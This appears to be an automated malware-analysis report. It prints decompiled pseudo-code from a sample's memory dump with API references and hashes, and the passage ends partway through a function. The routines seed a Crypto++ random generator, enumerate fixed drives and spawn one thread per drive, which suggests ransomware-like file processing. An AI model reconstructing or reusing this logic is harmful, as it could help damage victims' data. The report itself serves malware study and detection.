                    • Opcode Fuzzy Hash: 6a7ec3b41efa2a9cb4ea82847bc0fd5171db64c73b4a89e2e92ec799825bdf65
                    • Instruction Fuzzy Hash: 6B8129769412199ADF24EF68CD84BEA73BCEB14B2CF06409ED609D7180EB319E94CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E013E9FC0(HCRYPTPROV* __ecx) {
                    				char* _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v44;
                    				char _v84;
                    				void* __ebp;
                    				signed int _t11;
                    				signed int _t12;
                    				int _t14;
                    				char* _t18;
                    				int _t19;
                    				long _t27;
                    				HCRYPTPROV* _t39;
                    				signed int _t41;
                    
                    				_push(0xffffffff);
                    				_push(E01417C58);
                    				_push( *[fs:0x0]);
                    				_t11 =  *0x1435234; // 0x78d9f939
                    				_t12 = _t11 ^ _t41;
                    				_v20 = _t12;
                    				_push(_t12);
                    				 *[fs:0x0] =  &_v16;
                    				_t39 = __ecx;
                    				 *__ecx = 0; // executed
                    				_t14 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
                    				if(_t14 == 0) {
                    					_t27 = GetLastError();
                    					_t18 = CryptAcquireContextA(_t39, "Crypto++ RNG", 0, 1, 8);
                    					if(_t18 == 0) {
                    						_t19 = CryptAcquireContextA(_t39, "Crypto++ RNG", _t18, 1, 0x28);
                    						_t46 = _t19;
                    						if(_t19 == 0) {
                    							SetLastError(_t27);
                    							E013C2AD0( &_v44, "CryptAcquireContext");
                    							_v8 = 0;
                    							E013EA130( &_v84, _t46,  &_v44);
                    							E013F4EC6( &_v84, 0x1432bdc);
                    						}
                    					}
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t39, _v20 ^ _t41);
                    			}


















                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA005
                    • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA00B
                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA01F
                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028,?,Crypto++ RNG,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,78D9F939), ref: 013EA030
                    • SetLastError.KERNEL32(00000000,?,Crypto++ RNG,00000000,00000001,00000028,?,Crypto++ RNG,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000), ref: 013EA037
                      • Part of subcall function 013EA130: GetLastError.KERNEL32(00000010,78D9F939,75D701B0,?,00000000,?,?,?,?,?,?,?,?,01417CB6,000000FF), ref: 013EA171
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA066
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                    • String ID: CryptAcquireContext$Crypto++ RNG
                    • API String ID: 3279666080-1159690233
                    • Opcode ID: 0c52648e69cb754ca6f89f601ece284061d1d56c660c43aafd0e58611834f7a9
                    • Instruction ID: 99c16cbd1be387f9607bba61869a6ccb724e6633b012791f1f35ba71fe2a4b1f
                    • Opcode Fuzzy Hash: 0c52648e69cb754ca6f89f601ece284061d1d56c660c43aafd0e58611834f7a9
                    • Instruction Fuzzy Hash: A011D6B1B80759AADB209FA9CC45F9F77ECEB48B14F10012AF601E71C4DBB5A4048754
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E013CA164(void* __ecx, void* __eflags) {
                    				signed int _t65;
                    				HANDLE* _t73;
                    				long _t81;
                    				void* _t87;
                    				void* _t92;
                    				void** _t95;
                    				long _t96;
                    				signed int _t98;
                    				HANDLE* _t111;
                    				signed int _t127;
                    				intOrPtr _t128;
                    				long _t129;
                    				signed int _t130;
                    				intOrPtr _t131;
                    				void** _t132;
                    				void* _t133;
                    				void* _t137;
                    
                    				_t137 = __eflags;
                    				_push(0x40);
                    				E013F26F6(E0141615F);
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_push(_t133 - 0x1c); // executed
                    				E013C8F21(_t137); // executed
                    				_t98 = 0x18;
                    				asm("cdq");
                    				_t65 = ( *((intOrPtr*)(_t133 - 0x18)) -  *((intOrPtr*)(_t133 - 0x1c))) / _t98;
                    				 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
                    				_t130 = _t65;
                    				_t127 = 4;
                    				 *(_t133 - 0x40) = _t130;
                    				_push( ~(_t137 > 0) | _t65 * _t127);
                    				_t95 = E013F2CD3( ~(_t137 > 0) | _t65 * _t127, _t137);
                    				 *(_t133 - 0x38) = _t95;
                    				_push( ~(_t137 > 0) | _t130 * _t127);
                    				 *((intOrPtr*)(_t133 - 0x44)) = E013F2CD3( ~(_t137 > 0) | _t130 * _t127, _t137);
                    				_push( ~(_t137 > 0) | _t130 * _t127);
                    				_t73 = E013F2CD3( ~(_t137 > 0) | _t130 * _t127, _t137);
                    				_t131 =  *((intOrPtr*)(_t133 - 0x1c));
                    				_t128 =  *((intOrPtr*)(_t133 - 0x18));
                    				_t111 = _t73;
                    				 *(_t133 - 0x3c) = _t111;
                    				if(_t131 != _t128) {
                    					 *((intOrPtr*)(_t133 - 0x48)) =  *((intOrPtr*)(_t133 - 0x44)) - _t95;
                    					 *((intOrPtr*)(_t133 - 0x4c)) = _t111 - _t95;
                    					while(1) {
                    						E013C8943(_t133 - 0x34, _t131);
                    						 *(_t133 - 4) = 1;
                    						_t87 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
                    						 *_t95 = _t87;
                    						if(_t87 == 0) {
                    							break;
                    						}
                    						_t115 = _t133 - 0x34;
                    						if(_t87 != _t133 - 0x34) {
                    							E013C8D50(_t87, _t115, 0, 0xffffffff);
                    						}
                    						 *((short*)( *_t95 + 0x18)) =  *((intOrPtr*)(_t133 + 8));
                    						_t92 = CreateThread(0, 0, E013CA13F,  *_t95, 0,  *((intOrPtr*)(_t133 - 0x48)) + _t95); // executed
                    						 *( *((intOrPtr*)(_t133 - 0x4c)) + _t95) = _t92;
                    						if(_t92 == 0) {
                    							_push(3);
                    							L16:
                    							ExitProcess();
                    						}
                    						 *(_t133 - 4) = 0;
                    						_t95 =  &(_t95[1]);
                    						E013C8CB9(_t133 - 0x34, 1, 0);
                    						_t131 = _t131 + 0x18;
                    						if(_t131 != _t128) {
                    							continue;
                    						}
                    						_t95 =  *(_t133 - 0x38);
                    						_t111 =  *(_t133 - 0x3c);
                    						goto L8;
                    					}
                    					_push(2);
                    					goto L16;
                    				}
                    				L8:
                    				_t129 =  *(_t133 - 0x40);
                    				WaitForMultipleObjects(_t129, _t111, 1, 0xffffffff);
                    				if(_t129 != 0) {
                    					_t132 = _t95;
                    					_t81 =  *(_t133 - 0x3c) - _t95;
                    					 *(_t133 - 0x40) = _t81;
                    					_t96 = _t81;
                    					do {
                    						CloseHandle( *(_t132 + _t96));
                    						if( *_t132 != 0) {
                    							HeapFree(GetProcessHeap(), 0,  *_t132);
                    							 *_t132 =  *_t132 & 0x00000000;
                    						}
                    						_t132 =  &(_t132[1]);
                    						_t129 = _t129 - 1;
                    					} while (_t129 != 0);
                    					_t95 =  *(_t133 - 0x38);
                    				}
                    				L013F21E6(_t95);
                    				L013F21E6( *((intOrPtr*)(_t133 - 0x44)));
                    				L013F21E6( *(_t133 - 0x3c));
                    				return E013F26B1(E013C8D10(_t95, _t133 - 0x1c));
                    			}





















                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013CA16B
                      • Part of subcall function 013C8F21: __EH_prolog3_GS.LIBCMT ref: 013C8F28
                      • Part of subcall function 013C8F21: GetLogicalDriveStringsW.KERNEL32 ref: 013C8F93
                      • Part of subcall function 013C8F21: GetDriveTypeW.KERNEL32(?), ref: 013C901E
                    • GetProcessHeap.KERNEL32(00000008,0000001C), ref: 013CA20C
                    • HeapAlloc.KERNEL32(00000000), ref: 013CA213
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A13F,00000000,00000000,?), ref: 013CA252
                    • WaitForMultipleObjects.KERNEL32(?,00000000,00000001,000000FF), ref: 013CA293
                    • CloseHandle.KERNEL32(00000000), ref: 013CA2AC
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013CA2BB
                    • HeapFree.KERNEL32(00000000), ref: 013CA2C2
                    • ExitProcess.KERNEL32 ref: 013CA2FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$DriveH_prolog3_$AllocCloseCreateExitFreeHandleLogicalMultipleObjectsStringsThreadTypeWait
                    • String ID:
                    • API String ID: 1372296798-0
                    • Opcode ID: 971ca98b2304b415e034c4196fef8e1d3d37b2d9cd87aaa5a4568cef0c2a5fc2
                    • Instruction ID: 26033641ba37989d4a569c6b664422d9570a4a1d7701fe71026905b67cd9330d
                    • Opcode Fuzzy Hash: 971ca98b2304b415e034c4196fef8e1d3d37b2d9cd87aaa5a4568cef0c2a5fc2
                    • Instruction Fuzzy Hash: 4C51BD72E01219AFEF249FBCDC45BAEBBB5AF14704F10412DE611EB295EA759D008B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E013EA350(BYTE* _a4, int _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				int _v28;
                    				int _v44;
                    				char _v84;
                    				void* _v85;
                    				void* __ebp;
                    				signed int _t17;
                    				signed int _t18;
                    				long** _t20;
                    				int _t21;
                    				signed int _t37;
                    
                    				_push(0xffffffff);
                    				_push(E01417CE8);
                    				_push( *[fs:0x0]);
                    				_t17 =  *0x1435234; // 0x78d9f939
                    				_t18 = _t17 ^ _t37;
                    				_v20 = _t18;
                    				_push(_t18);
                    				 *[fs:0x0] =  &_v16;
                    				_t20 = E013EA3F0(); // executed
                    				_t21 = CryptGenRandom( *_t20, _a8, _a4);
                    				_t40 = _t21;
                    				if(_t21 == 0) {
                    					_v24 = 0xf;
                    					_v28 = _t21;
                    					_v44 = _t21;
                    					E013C64B7( &_v44, _t40, "CryptGenRandom", 0xe);
                    					_v8 = 0;
                    					E013EA130( &_v84, _t40,  &_v44);
                    					_t21 = E013F4EC6( &_v84, 0x1432bdc);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t21, _v20 ^ _t37);
                    			}


















                    APIs
                      • Part of subcall function 013EA3F0: new.LIBCMT ref: 013EA473
                      • Part of subcall function 013EA3F0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013EA4AD
                    • CryptGenRandom.ADVAPI32(00000000,?,?,78D9F939), ref: 013EA38A
                      • Part of subcall function 013EA130: GetLastError.KERNEL32(00000010,78D9F939,75D701B0,?,00000000,?,?,?,?,?,?,?,?,01417CB6,000000FF), ref: 013EA171
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA3CC
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
                    • String ID: CryptGenRandom
                    • API String ID: 1600773198-3616286655
                    • Opcode ID: 7e4fcd8c23a3777cafc1c3050ab6c8aff7a6e8362f654f1476afdadadd17d198
                    • Instruction ID: bdd6e501dfde2114013f27f3c16b441189c35b0a16d34024352abefeea632a0a
                    • Opcode Fuzzy Hash: 7e4fcd8c23a3777cafc1c3050ab6c8aff7a6e8362f654f1476afdadadd17d198
                    • Instruction Fuzzy Hash: 0B113071904259EFCB11DFA4C945BDEBBF8FB18724F10012EE401B7290EB74A504CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E013C8F21(void* __eflags) {
                    				long _t51;
                    				signed int _t55;
                    				int _t60;
                    				void* _t67;
                    				WCHAR* _t71;
                    				intOrPtr _t88;
                    				intOrPtr* _t89;
                    				signed int _t90;
                    				intOrPtr _t91;
                    				void* _t92;
                    				void* _t95;
                    
                    				_t95 = __eflags;
                    				_push(0x40);
                    				E013F26F6(E014160C0);
                    				_t89 =  *((intOrPtr*)(_t92 + 8));
                    				 *((intOrPtr*)(_t92 - 0x44)) = _t89;
                    				 *((intOrPtr*)(_t92 - 0x48)) = 0;
                    				asm("stosd");
                    				 *((intOrPtr*)(_t92 - 0x4c)) = _t89;
                    				asm("stosd");
                    				asm("stosd");
                    				 *((intOrPtr*)(_t92 - 0x1c)) = 0;
                    				 *((intOrPtr*)(_t92 - 0x18)) = 0;
                    				 *((intOrPtr*)(_t92 - 0x14)) = 0;
                    				 *((intOrPtr*)(_t92 - 4)) = 1;
                    				_push(0x208);
                    				_t71 = E013F2CD3(0, _t95);
                    				if(_t71 == 0) {
                    					_t71 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(0x208, _t71, 0, 0x208);
                    				}
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				 *_t89 = 0;
                    				 *((intOrPtr*)(_t89 + 4)) = 0;
                    				 *((intOrPtr*)(_t89 + 8)) = 0;
                    				 *((intOrPtr*)(_t92 - 0x48)) = 1;
                    				_t51 = GetLogicalDriveStringsW(0x104, _t71); // executed
                    				if(_t51 != 0) {
                    					_t90 = 0;
                    					do {
                    						_t55 = _t71[_t90] & 0x0000ffff;
                    						if(_t55 != 0) {
                    							 *(_t92 - 0x40) = _t55;
                    							 *((short*)(_t92 - 0x3e)) =  *((intOrPtr*)(_t71 + 2 + _t90 * 2));
                    							 *((short*)(_t92 - 0x3c)) =  *((intOrPtr*)(_t71 + 4 + _t90 * 2));
                    							_push(_t92 - 0x35);
                    							_t67 = E013C896B(_t92 - 0x34, _t92 - 0x40, _t92 - 0x3a);
                    							 *((char*)(_t92 - 4)) = 2;
                    							E013C982D(_t71, _t92 - 0x1c, _t67);
                    							 *((char*)(_t92 - 4)) = 1;
                    							E013C8CB9(_t92 - 0x34, 1, 0);
                    						}
                    						_t90 = _t90 + 4;
                    					} while (_t90 < 0x64);
                    					_t91 =  *((intOrPtr*)(_t92 - 0x1c));
                    					if(_t91 !=  *((intOrPtr*)(_t92 - 0x18))) {
                    						_t88 =  *((intOrPtr*)(_t92 - 0x44));
                    						do {
                    							E013C8943(_t92 - 0x34, _t91);
                    							 *((char*)(_t92 - 4)) = 3;
                    							_t59 =  >=  ?  *((void*)(_t92 - 0x34)) : _t92 - 0x34;
                    							_t60 = GetDriveTypeW( >=  ?  *((void*)(_t92 - 0x34)) : _t92 - 0x34); // executed
                    							if(_t60 == 3) {
                    								_push(_t92 - 0x34);
                    								E013C989A(_t88);
                    							}
                    							 *((char*)(_t92 - 4)) = 1;
                    							E013C8CB9(_t92 - 0x34, 1, 0);
                    							_t91 = _t91 + 0x18;
                    						} while (_t91 !=  *((intOrPtr*)(_t92 - 0x18)));
                    					}
                    					L013F21E6(_t71);
                    					_t89 =  *((intOrPtr*)(_t92 - 0x44));
                    				}
                    				E013C8D10(_t71, _t92 - 0x1c);
                    				return E013F26B1(_t89);
                    			}

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C8F28
                    • GetLogicalDriveStringsW.KERNEL32 ref: 013C8F93
                    • GetDriveTypeW.KERNEL32(?), ref: 013C901E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Drive$H_prolog3_LogicalStringsType
                    • String ID:
                    • API String ID: 2983389820-0
                    • Opcode ID: 9d03458bba9750e4faf104c5711b3c89d65ee10488560ef29a4bd8e33b11bae2
                    • Instruction ID: 661214b8c8848198842b337f18ad0c3df23b9d183daf6912198cf968fdfd015f
                    • Opcode Fuzzy Hash: 9d03458bba9750e4faf104c5711b3c89d65ee10488560ef29a4bd8e33b11bae2
                    • Instruction Fuzzy Hash: A6416E75C0121AEADF10EFE8D844AEEFBB5AF54B08F11405DE605B7240D7B4AE45CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E013EBAB0(intOrPtr* __ecx, signed int __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t211;
                    				signed char _t216;
                    				char _t218;
                    				void* _t222;
                    				signed int _t228;
                    				signed char _t231;
                    				signed int _t237;
                    				signed char _t239;
                    				intOrPtr _t241;
                    				void* _t256;
                    				signed int _t257;
                    				void* _t286;
                    				void* _t291;
                    				void* _t297;
                    				intOrPtr _t302;
                    				unsigned int _t325;
                    				intOrPtr* _t342;
                    				void* _t343;
                    				signed char _t344;
                    				signed char _t345;
                    				void* _t347;
                    				void* _t348;
                    				unsigned int* _t350;
                    				void* _t369;
                    				void* _t375;
                    				signed int _t378;
                    				void* _t380;
                    				signed char _t390;
                    				signed int _t416;
                    				unsigned int _t427;
                    				signed int _t429;
                    				unsigned int _t432;
                    				unsigned int _t435;
                    				signed int _t438;
                    				intOrPtr _t439;
                    				intOrPtr _t444;
                    				signed int _t446;
                    				intOrPtr _t447;
                    				signed char _t454;
                    				signed int _t458;
                    				signed int _t459;
                    				signed int _t460;
                    				signed char _t462;
                    				intOrPtr* _t463;
                    				void* _t466;
                    				signed int _t471;
                    				void* _t472;
                    				void* _t474;
                    				void* _t475;
                    				void* _t476;
                    				void* _t480;
                    				void* _t481;
                    				void* _t483;
                    
                    				_t414 = __edx;
                    				_t471 = _t472 - 0x50;
                    				_push(0xffffffff);
                    				_push(E0141811A);
                    				_push( *[fs:0x0]);
                    				_t474 = _t472 - 0x10;
                    				_t211 =  *0x1435234; // 0x78d9f939
                    				_push(_t211 ^ _t471);
                    				 *[fs:0x0] = _t471 - 0xc;
                    				_t342 = __ecx;
                    				 *((intOrPtr*)(_t471 + 0x24)) = __ecx;
                    				_t438 =  *(_t471 + 0x64);
                    				E013EAE90(_t471 + 0x18, __edx, _t438);
                    				 *((intOrPtr*)(_t471 - 4)) = 0;
                    				_t458 = 0;
                    				 *(_t471 + 0x44) = 0;
                    				 *(_t471 + 0x2c) = 0;
                    				 *(_t471 + 0x40) = 0;
                    				 *(_t471 + 0x30) = 0;
                    				 *(_t471 + 0x4c) = 0;
                    				 *(_t471 + 0x34) = 0;
                    				 *((char*)(_t471 - 4)) = 1;
                    				if(_t438 != 0) {
                    					_t486 = _t438 - 0x3ffffff;
                    					if(_t438 > 0x3ffffff) {
                    						L2:
                    						_push("vector<T> too long");
                    						E013F0F81(_t414, _t438, _t458, _t486);
                    					}
                    					E013EC080(_t471 + 0x2c, _t414, _t486, _t438);
                    					_t458 =  *(_t471 + 0x30);
                    					 *(_t471 + 0x4c) =  *(_t471 + 0x34);
                    					 *(_t471 + 0x40) = _t458;
                    					 *(_t471 + 0x44) =  *(_t471 + 0x2c);
                    				}
                    				_t216 =  *(_t471 + 0x18);
                    				 *((intOrPtr*)(_t471 + 0x3c)) = 0;
                    				_t487 = _t438;
                    				if(_t438 != 0) {
                    					 *((intOrPtr*)(_t471 + 0x28)) = 0;
                    					 *(_t471 + 0x38) = _t216;
                    					do {
                    						_t438 = E013EB010(_t487,  *((intOrPtr*)(_t471 + 0x60)),  *((intOrPtr*)( *((intOrPtr*)( *_t342 + 0x14))))() & 0x000000ff, 0);
                    						_t390 =  *(_t471 + 0x44);
                    						 *((char*)(_t471 - 4)) = 2;
                    						if(_t438 >= _t458 || _t390 > _t438) {
                    							_t427 =  *(_t471 + 0x4c);
                    							__eflags = _t458 - _t427;
                    							if(_t458 != _t427) {
                    								L18:
                    								 *(_t471 + 0x48) = _t458;
                    								 *(_t471 + 0x40) = _t458;
                    								 *((char*)(_t471 - 4)) = 5;
                    								__eflags = _t458;
                    								if(_t458 != 0) {
                    									E013D2100(_t427, _t438);
                    									 *((char*)(_t471 - 4)) = 6;
                    									goto L20;
                    								}
                    								goto L21;
                    							} else {
                    								__eflags = _t427 - _t458 >> 6 - 1;
                    								if(_t427 - _t458 >> 6 >= 1) {
                    									goto L18;
                    								} else {
                    									_t458 = _t458 - _t390 >> 6;
                    									__eflags = 0x3ffffff - _t458 - 1;
                    									if(__eflags < 0) {
                    										goto L2;
                    									} else {
                    										_t466 = _t458 + 1;
                    										_t435 = _t427 - _t390 >> 6;
                    										 *(_t471 + 0x4c) = _t435;
                    										_t325 = _t435 >> 1;
                    										__eflags = 0x3ffffff - _t325 -  *(_t471 + 0x4c);
                    										_t427 =  >=  ? _t325 + _t435 : 0;
                    										__eflags = _t427 - _t466;
                    										_t467 =  >=  ? _t427 : _t466;
                    										E013EC080(_t471 + 0x2c, _t427, _t427 - _t466,  >=  ? _t427 : _t466);
                    										_t458 =  *(_t471 + 0x30);
                    										 *(_t471 + 0x4c) =  *(_t471 + 0x34);
                    										 *(_t471 + 0x44) =  *(_t471 + 0x2c);
                    										goto L18;
                    									}
                    								}
                    							}
                    						} else {
                    							_t414 =  *(_t471 + 0x4c);
                    							_t438 = _t438 - _t390;
                    							if(_t458 != _t414 || _t414 - _t458 >> 6 >= 1) {
                    								L12:
                    								 *(_t471 + 0x48) = _t458;
                    								_t438 = (_t438 & 0xffffffc0) + _t390;
                    								 *(_t471 + 0x40) = _t458;
                    								 *((char*)(_t471 - 4)) = 3;
                    								if(_t458 != 0) {
                    									E013D2100(_t414, _t438);
                    									 *((char*)(_t471 - 4)) = 4;
                    									L20:
                    									_t56 = _t438 + 0x18; // 0x18
                    									E013D2100(_t414, _t56);
                    									 *((intOrPtr*)(_t458 + 0x30)) =  *((intOrPtr*)(_t438 + 0x30));
                    									 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t438 + 0x34));
                    									 *((intOrPtr*)(_t458 + 0x38)) =  *((intOrPtr*)(_t438 + 0x38));
                    									 *((char*)(_t458 + 0x3c)) =  *((intOrPtr*)(_t438 + 0x3c));
                    									 *((char*)(_t458 + 0x3d)) =  *((intOrPtr*)(_t438 + 0x3d));
                    									 *((char*)(_t458 + 0x3e)) =  *((intOrPtr*)(_t438 + 0x3e));
                    									 *((char*)(_t458 + 0x3f)) =  *((intOrPtr*)(_t438 + 0x3f));
                    								}
                    								goto L21;
                    							} else {
                    								_t458 = _t458 - _t390 >> 6;
                    								if(0x3ffffff - _t458 < 1) {
                    									goto L2;
                    								} else {
                    									_t432 = _t414 - _t390 >> 6;
                    									 *(_t471 + 0x4c) = _t432;
                    									_t414 =  >=  ? (_t432 >> 1) + _t432 : 0;
                    									_t470 =  >=  ?  >=  ? (_t432 >> 1) + _t432 : 0 : _t458 + 1;
                    									E013EC080(_t471 + 0x2c,  >=  ? (_t432 >> 1) + _t432 : 0, ( >=  ? (_t432 >> 1) + _t432 : 0) - _t458 + 1,  >=  ?  >=  ? (_t432 >> 1) + _t432 : 0 : _t458 + 1);
                    									_t390 =  *(_t471 + 0x2c);
                    									_t458 =  *(_t471 + 0x30);
                    									 *(_t471 + 0x4c) =  *(_t471 + 0x34);
                    									 *(_t471 + 0x44) = _t390;
                    									goto L12;
                    								}
                    							}
                    						}
                    						goto L28;
                    						L21:
                    						 *((intOrPtr*)(_t471 + 0x60)) =  *((intOrPtr*)(_t471 + 0x60)) + 0x18;
                    						_t458 = _t458 + 0x40;
                    						 *(_t471 + 0x30) = _t458;
                    						 *(_t471 + 0x40) = _t458;
                    						_t286 =  *(_t471 - 0x24);
                    						_t392 =  >=  ? _t471 - 0x28 : _t471 - 0x2c;
                    						 *(_t471 + 0x48) = _t286;
                    						_push( *(_t471 + 0x48));
                    						 *((char*)(_t471 - 4)) = 7;
                    						_t429 =  *( >=  ? _t471 - 0x28 : _t471 - 0x2c);
                    						memset(_t286, 0, _t429 << 2);
                    						_t481 = _t474 + 0xc;
                    						if(_t429 == 0) {
                    							L013CDA60();
                    						} else {
                    							E013CD9E0();
                    						}
                    						_t291 =  *(_t471 - 0x3c);
                    						_t396 =  >=  ? _t471 - 0x40 : _t471 - 0x44;
                    						 *(_t471 + 0x48) = _t291;
                    						_push( *(_t471 + 0x48));
                    						 *((char*)(_t471 - 4)) = 8;
                    						_t414 =  *( >=  ? _t471 - 0x40 : _t471 - 0x44);
                    						memset(_t291, 0, _t414 << 2);
                    						_t483 = _t481 + 0x10;
                    						if(_t414 == 0) {
                    							L013CDA60();
                    						} else {
                    							E013CD9E0();
                    						}
                    						_t474 = _t483 + 4;
                    						 *((char*)(_t471 - 4)) = 1;
                    						E013EB810( *((intOrPtr*)(_t471 + 0x28)) +  *(_t471 + 0x44), _t414);
                    						_t297 =  *((intOrPtr*)( *_t342 + 8))();
                    						_t454 =  *(_t471 + 0x38);
                    						E013EC610(_t454, 1 <<  *((intOrPtr*)( *((intOrPtr*)(_t471 + 0x28)) +  *(_t471 + 0x44) + 0x30)) - 1, _t297);
                    						 *((intOrPtr*)(_t471 + 0x28)) =  *((intOrPtr*)(_t471 + 0x28)) + 0x40;
                    						_t302 =  *((intOrPtr*)(_t471 + 0x3c)) + 1;
                    						 *((intOrPtr*)(_t471 + 0x3c)) = _t302;
                    						 *(_t471 + 0x38) = _t454 + 0xc;
                    					} while (_t302 <  *(_t471 + 0x64));
                    				}
                    				L28:
                    				_t439 = 0;
                    				 *((intOrPtr*)(_t471 + 0x3c)) = 0;
                    				E013D2100(_t414,  *(_t471 + 0x5c));
                    				 *((char*)(_t471 - 4)) = 9;
                    				while(1) {
                    					_t459 =  *(_t471 + 0x64);
                    					_t218 = 0;
                    					 *((char*)(_t471 + 0x63)) = 0;
                    					if(_t459 == 0) {
                    						break;
                    					}
                    					_t378 = _t459;
                    					_t426 =  *(_t471 + 0x18);
                    					_t350 =  *(_t471 + 0x44) + 0x38;
                    					_t463 =  *((intOrPtr*)(_t471 + 0x24));
                    					 *(_t471 + 0x5c) = _t426;
                    					 *(_t471 + 0x38) = _t378;
                    					do {
                    						if(_t350[1] == 0 && _t439 ==  *((intOrPtr*)(_t350 - 4))) {
                    							_t380 =  *_t426 + (( *_t350 >> 1) + ( *_t350 >> 1) * 2) * 8;
                    							 *(_t471 + 0x48) = _t380;
                    							if(_t350[1] == 0) {
                    								_t426 = _t471;
                    								 *((intOrPtr*)( *_t463 + 0x20))(_t380, _t471);
                    							} else {
                    								_t447 =  *_t463;
                    								 *((intOrPtr*)(_t447 + 0x20))( *(_t471 + 0x48),  *((intOrPtr*)(_t447 + 0x10))(_t471));
                    								_t439 =  *((intOrPtr*)(_t471 + 0x3c));
                    							}
                    							E013EB810(_t350 - 0x38, _t426);
                    							_t218 =  *((intOrPtr*)(_t471 + 0x63));
                    							_t426 =  *(_t471 + 0x5c);
                    							_t378 =  *(_t471 + 0x38);
                    						}
                    						if(_t218 != 0 || _t350[1] == _t218) {
                    							_t218 = 1;
                    						}
                    						_t426 = _t426 + 0xc;
                    						 *((char*)(_t471 + 0x63)) = _t218;
